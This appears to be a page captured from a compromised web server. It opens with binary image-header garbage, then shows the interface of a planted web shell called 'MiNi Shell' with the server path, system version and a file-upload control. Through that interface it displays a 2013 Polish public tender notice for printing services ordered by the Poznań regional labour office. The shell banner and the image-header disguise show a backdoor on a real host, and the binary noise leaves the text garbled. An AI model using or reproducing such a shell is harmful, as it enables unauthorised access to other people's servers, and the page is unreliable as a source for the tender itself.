JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130208/54054-N-2013.html

<p class="kh_header"><b>Poznań: Druk publikacji dla Wojewódzkiego Urzędu Pracy w Poznaniu w 2013 r. 
oraz druk publikacji książkowych dla WORP</b><br>
<b>Numer ogłoszenia: 54054 - 2013; data zamieszczenia: 08.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 61 8463819, faks 61 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk publikacji dla Wojewódzkiego Urzędu Pracy w Poznaniu w 2013 r. 
oraz druk publikacji książkowych dla WORP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie zostało podzielone na 2 części, Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne części, z których każda stanowi odrębną część przedmiotu zamówienia. Przedmiotem zamówienia jest:  
1) Część 1 - druk publikacji - odbiór materiałów przygotowanych przez Zamawiającego, druk publikacji dla Wojewódzkiego Urzędu Pracy w Poznaniu na materiałach Wykonawcy oraz dostarczenie wydrukowanych publikacji do siedziby Zamawiającego na koszt Wykonawcy, od dnia podpisania umowy do 31 grudnia 2013 r. lub do czasu wyczerpania kwoty na jaką zostanie zawarta umowa,
2) Część 2 - druk publikacji książkowych - odbiór materiałów przygotowanych przez Zamawiającego, druk dwóch publikacji książkowych w nakładzie 100 szt. każda, zawierających treść raportów i analiz z badań prowadzonych przez Wielkopolskie Obserwatorium Rynku Pracy, opracowanie graficzne, przygotowanie do druku, druk publikacji książkowych na materiałach Wykonawcy oraz dostarczenie wydrukowanych publikacji do siedziby Zamawiającego na koszt Wykonawcy, w ciągu 53 dni kalendarzowych od dnia następującego po dniu zawarcia umowy. 
2. Szczegółowy opis przedmiotu zamówienia z określeniem wymagań Zamawiającego, które w ramach przedmiotu zamówienia ma zrealizować i zapewnić Wykonawca, został określony w załączniku nr 1 dla części 1 i w załączniku nr 2 dla części 2, stanowiących integralną część SIWZ.
3. Do wykonania niniejszego przedmiotu zamówienia Wykonawca użyje materiałów zgodnych z opisem przedmiotu zamówienia zawartym w Załączniku nr 1 do SIWZ dla części 1 i w Załączniku nr 2 do SIWZ dla części 2.
4. Przedmiot umowy Wykonawca zobowiązany jest wykonać z należytą starannością i z uwzględnieniem profesjonalnego charakteru świadczonych przez siebie usług oraz wedle swej najlepszej wiedzy i umiejętności.
5. Warunkiem odbioru danej partii publikacji jest podpisanie każdorazowo protokołu odbioru.
6. W przypadku wystąpienia wad z przyczyn leżących po stronie Wykonawcy, w wydrukowanych materiałach, Wykonawca zobowiązuje się do ich wymiany na niezawierające wad, w ciągu 5 dni roboczych od chwili zgłoszenia wad.
7. Przedmiot zamówienia przygotowany będzie do druku w wersji elektronicznej (plik CDR w Corelu lub PDF, przesyłane na płycie CD albo pocztą e-mail lub przekazane Wykonawcy w siedzibie Zamawiającego ), za zwrotnym potwierdzeniem odbioru. 
8. W przypadku odbioru materiałów z siedziby Zamawiającego, Wykonawca  zobowiązany jest - w terminie 24 godzin od momentu telefonicznego zgłoszenia przez Zamawiającego - do odbioru przygotowanych przez niego poszczególnych partii materiałów do druku.
Dot. części 1:
9. Zamawiający zastrzega sobie prawo do korekty, polegającej na zmianach treści merytorycznej oddanych do druku materiałów, ale nie później niż 2 dni robocze przed rozpoczęciem druku.
10. Wykonawca zobowiązany jest do dostarczenia poszczególnych partii druku publikacji do siedziby Zamawiającego w terminie 5 dni roboczych od momentu odbioru materiałów do druku od Zamawiającego.
11. Zamawiający zastrzega sobie możliwość zmniejszenia ilościowego zamówienia, nie więcej jednak niż o 20%. Przedstawione w ofercie przez Wykonawcę ceny za wykonanie pojedynczych publikacji będą obowiązywały również w przypadku zmiany ilościowej zamówienia.  
Dot. części 2:
12. Przedmiot zamówienia jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, projekt systemowy w ramach Poddziałania 6.1.2 PO KL Wielkopolskie Obserwatorium Rynku Pracy.
13. Wykonawca zobowiązany jest, zgodnie z zapisami Systemu Realizacji Programu Operacyjnego Kapitał Ludzki, do poddania się kontroli oraz do udostępnienia dokumentów związanych z realizacją zamówienia, w tym dokumentów finansowych, do dnia 31 grudnia 2020 roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek, jeśli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonuje (tylko w przypadku świadczeń okresowych lub ciągłych) lub wykonał należycie co najmniej dwie usługi o podobnym charakterze: 
- w części 1 o wartości nie mniejszej niż 35 000 zł brutto każda, 
- w części 2 o wartości nie mniejszej niż 3 500,00 zł brutto każda</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony załącznik nr 3 - FORMULARZ OFERTY,
2) wypełniony załącznik nr 8 - Formularz cenowy dla części 1,
3) pełnomocnictwo(a) do podpisania oferty w przypadku, jeżeli osoba podpisująca ofertę nie jest osobą umocowaną na podstawie odpisu z właściwego rejestru lub nie jest Wykonawcą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część 1.
Strony ustalają możliwość zmniejszenia ilościowego zamówienia, nie więcej jednak niż o 20%. Przedstawione w ofercie przez Wykonawcę ceny za wykonanie pojedynczych publikacji będą obowiązywały również w przypadku zmiany ilościowej zamówienia.
Część 2.
Zamawiający uwzględnia możliwość zmiany postanowień umowy w zakresie wydłużenia terminu końcowego realizacji przedmiotu zamówienia maksymalnie do 7 dni kalendarzowych, z przyczyn leżących po stronie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Poznaniu, ul. Kościelna 37, 60-537 Poznań, II p., pokój nr 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 09:20, miejsce: Wojewódzki Urząd Pracy w Poznaniu, ul. Kościelna 37, 60-537 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> część 2 - projekt systemowy w ramach Poddziałania 6.1.2 PO KL Wielkopolskie Obserwatorium Rynku Pracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk publikacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odbiór materiałów przygotowanych przez Zamawiającego, druk publikacji dla Wojewódzkiego Urzędu Pracy w Poznaniu na materiałach Wykonawcy oraz dostarczenie wydrukowanych publikacji do siedziby Zamawiającego na koszt Wykonawcy, od dnia podpisania umowy 
do 31 grudnia 2013 r. lub do czasu wyczerpania kwoty na jaką zostanie zawarta umowa,
2. Szczegółowy opis przedmiotu zamówienia z określeniem wymagań Zamawiającego, które w ramach przedmiotu zamówienia ma zrealizować i zapewnić Wykonawca, został określony w załączniku nr 1 , stanowiącym integralną część SIWZ.
3. Do wykonania niniejszego przedmiotu zamówienia Wykonawca użyje materiałów zgodnych z opisem przedmiotu zamówienia zawartym w Załączniku nr 1 do SIWZ.
4. Przedmiot umowy Wykonawca zobowiązany jest wykonać z należytą starannością i z uwzględnieniem profesjonalnego charakteru świadczonych przez siebie usług oraz wedle swej najlepszej wiedzy i umiejętności.
5. Warunkiem odbioru danej partii publikacji jest podpisanie każdorazowo protokołu odbioru.
6. W przypadku wystąpienia wad z przyczyn leżących po stronie Wykonawcy, w wydrukowanych materiałach, Wykonawca zobowiązuje się do ich wymiany na niezawierające wad, w ciągu 5 dni roboczych od chwili zgłoszenia wad.
7. Zamawiający zastrzega sobie prawo do korekty, polegającej na zmianach treści merytorycznej oddanych do druku materiałów, ale nie później niż 2 dni robocze przed rozpoczęciem druku.
8. Przedmiot zamówienia przygotowany będzie do druku w wersji elektronicznej (plik CDR w Corelu lub PDF, przesyłane na płycie CD albo pocztą e-mail lub przekazane Wykonawcy w siedzibie Zamawiającego ), za zwrotnym potwierdzeniem odbioru. 
9. W przypadku odbioru materiałów z siedziby Zamawiającego, Wykonawca  zobowiązany jest - w terminie 24 godzin od momentu telefonicznego zgłoszenia przez Zamawiającego - do odbioru przygotowanych przez niego poszczególnych partii materiałów do druku.
10. Wykonawca zobowiązany jest do dostarczenia poszczególnych partii druku publikacji do siedziby Zamawiającego w terminie 5 dni roboczych od momentu odbioru materiałów do druku od Zamawiającego.
11. Zamawiający zastrzega sobie możliwość zmniejszenia ilościowego zamówienia, nie więcej jednak niż o 20%. Przedstawione w ofercie przez Wykonawcę ceny za wykonanie pojedynczych publikacji będą obowiązywały również w przypadku zmiany ilościowej zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk publikacji książkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odbiór materiałów przygotowanych przez Zamawiającego, druk dwóch publikacji książkowych w nakładzie 100 szt. każda, zawierających treść raportów i analiz z badań prowadzonych przez Wielkopolskie Obserwatorium Rynku Pracy, opracowanie graficzne, przygotowanie do druku, druk publikacji książkowych na materiałach Wykonawcy oraz dostarczenie wydrukowanych publikacji do siedziby Zamawiającego na koszt Wykonawcy, w ciągu 53 dni kalendarzowych od dnia następującego po dniu zawarcia umowy. 
2. Szczegółowy opis przedmiotu zamówienia z określeniem wymagań Zamawiającego, które w ramach przedmiotu zamówienia ma zrealizować i zapewnić Wykonawca, został określony w załączniku nr 2, stanowiącym integralną część SIWZ.
3. Do wykonania niniejszego przedmiotu zamówienia Wykonawca użyje materiałów zgodnych z opisem przedmiotu zamówienia zawartym w Załączniku nr 2 do SIWZ.
4. Przedmiot umowy Wykonawca zobowiązany jest wykonać z należytą starannością i z uwzględnieniem profesjonalnego charakteru świadczonych przez siebie usług oraz wedle swej najlepszej wiedzy i umiejętności.
5. Warunkiem odbioru danej partii publikacji jest podpisanie każdorazowo protokołu odbioru.
6. W przypadku wystąpienia wad z przyczyn leżących po stronie Wykonawcy, w wydrukowanych materiałach, Wykonawca zobowiązuje się do ich wymiany na niezawierające wad, w ciągu 5 dni roboczych od chwili zgłoszenia wad.
7. Przedmiot zamówienia przygotowany będzie do druku w wersji elektronicznej (plik CDR w Corelu lub PDF, przesyłane na płycie CD albo pocztą e-mail lub przekazane Wykonawcy w siedzibie Zamawiającego ), za zwrotnym potwierdzeniem odbioru. 
8. W przypadku odbioru materiałów z siedziby Zamawiającego, Wykonawca  zobowiązany jest - w terminie 24 godzin od momentu telefonicznego zgłoszenia przez Zamawiającego - do odbioru przygotowanych przez niego poszczególnych partii materiałów do druku.
9.  Przedmiot zamówienia jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego,  projekt systemowy w ramach Poddziałania 6.1.2 PO KL Wielkopolskie Obserwatorium Rynku Pracy.
10. Wykonawca zobowiązany jest, zgodnie z zapisami Systemu Realizacji Programu Operacyjnego Kapitał Ludzki, do poddania się kontroli oraz do udostępnienia dokumentów związanych z realizacją zamówienia, w tym dokumentów finansowych, do dnia 31 grudnia 2020 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 53.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com